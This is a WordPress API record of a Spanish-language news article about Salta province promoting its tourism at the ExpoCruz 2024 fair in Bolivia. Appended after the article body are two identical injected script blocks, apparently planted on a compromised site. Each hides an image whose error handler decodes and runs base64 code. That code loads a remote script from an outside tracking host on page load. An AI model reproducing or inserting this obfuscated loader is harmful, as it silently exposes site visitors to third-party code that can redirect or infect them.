{"id":4440,"date":"2024-09-26T10:39:19","date_gmt":"2024-09-26T13:39:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4440"},"modified":"2025-08-13T23:48:14","modified_gmt":"2025-08-14T02:48:14","slug":"salta-deslumbra-con-sus-atractivos-turisticos-en-expocruz-2024","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4440","title":{"rendered":"Salta deslumbra con sus atractivos tur\u00edsticos en ExpoCruz 2024"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8d85fcada0b8b94e56afaaa6c895e5a5\" style=\"background-color:#76053f\"><em>La Provincia tiene una destacada presencia en una de las ferias multisectoriales m\u00e1s importante de Bolivia que se desarrollar\u00e1 hasta el domingo 29 de septiembre en la ciudad de Santa Cruz de la Sierra.<\/em><\/h4>\n\n\n\n<p>Salta promociona sus paisajes, atractivos, productos y servicios en una nueva edici\u00f3n de Expocruz que se extender\u00e1 hasta el 29 de septiembre en la ciudad de Santa Cruz de la Sierra, Bolivia. La muestra, visitada a\u00f1o a a\u00f1o por m\u00e1s de 400 mil personas, cuenta con 3 mil expositores provenientes de 31 pa\u00edses procedentes de todas las latitudes del mundo.<\/p>\n\n\n\n<p>Con el apoyo del Consejo Federal de Inversiones (CFI), y la coordinaci\u00f3n de la Fundaci\u00f3n ProSalta y la Secretar\u00eda de Industria, Comercio y Empleo del Ministerio de Producci\u00f3n y Desarrollo Sustentable, Salta cuenta con un stand dentro del pabell\u00f3n de la Rep\u00fablica Argentina.<\/p>\n\n\n\n<p>Dentro del sector tur\u00edstico de Salta liderado por la directora ejecutiva del Instituto de Promoci\u00f3n Tur\u00edstica, Mar\u00eda Eugenia Cornejo, participan representantes del Ente de Turismo de la Ciudad de Salta, de la C\u00e1mara de Turismo y Comercio de San Lorenzo, de la C\u00e1mara de Turismo de Vaqueros, de Silvia Magno&nbsp;Viajes y Turismo, de Norte Verde Paseos y Traves\u00edas, de Extreme Games ECT, de Kuntur Trek, de Amalinas Viajes y de Willka Turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14102-salta-deslumbra-con-sus-atractivos-turisticos-en-expocruz-2024.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14102-salta-deslumbra-con-sus-atractivos-turisticos-en-expocruz-2024.jpg\" alt=\"Salta deslumbra con sus atractivos tur\u00edsticos en ExpoCruz 2024.\"\/><\/a><\/figure>\n\n\n\n<p>\u00abBolivia es un mercado prioritario para nosotros, con un gran potencial de crecimiento. Salta es el segundo destino argentino elegido por los bolivianos, despu\u00e9s de Buenos Aires\u00bb, expres\u00f3 Cornejo, quien resalt\u00f3 la creciente demanda por la Ruta del Vino de Altura, la gastronom\u00eda regional, las actividades culturales, y la vida nocturna en las pe\u00f1as, restaurantes y bares, donde la m\u00fasica en vivo y la hospitalidad salte\u00f1a crean una experiencia \u00fanica.<\/p>\n\n\n\n<p>Adem\u00e1s en la oportunidad est\u00e1n presentes tambi\u00e9n diferentes artesanos como Yama Sabores Ahumados, AM Artesan\u00edas, Esquina del Carpincho y Art Salta.<\/p>\n\n\n\n<p>La participaci\u00f3n de Salta en Expocruz 2024 busca fortalecer los lazos tur\u00edsticos con Bolivia, promoviendo su identidad cultural y natural a trav\u00e9s de una oferta tur\u00edstica rica y diversa, destacando siempre la hospitalidad y el esp\u00edritu acogedor de su gente.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Provincia tiene una destacada presencia en una de las ferias multisectoriales m\u00e1s importante de Bolivia que se desarrollar\u00e1 hasta el domingo 29 de septiembre en la ciudad de Santa Cruz de la Sierra. Salta promociona sus paisajes, atractivos, productos y servicios en una nueva edici\u00f3n de Expocruz que se extender\u00e1 hasta el 29 de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4441,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4440","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4440"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4440"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4440\/revisions"}],"predecessor-version":[{"id":6676,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4440\/revisions\/6676"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4441"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4440"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}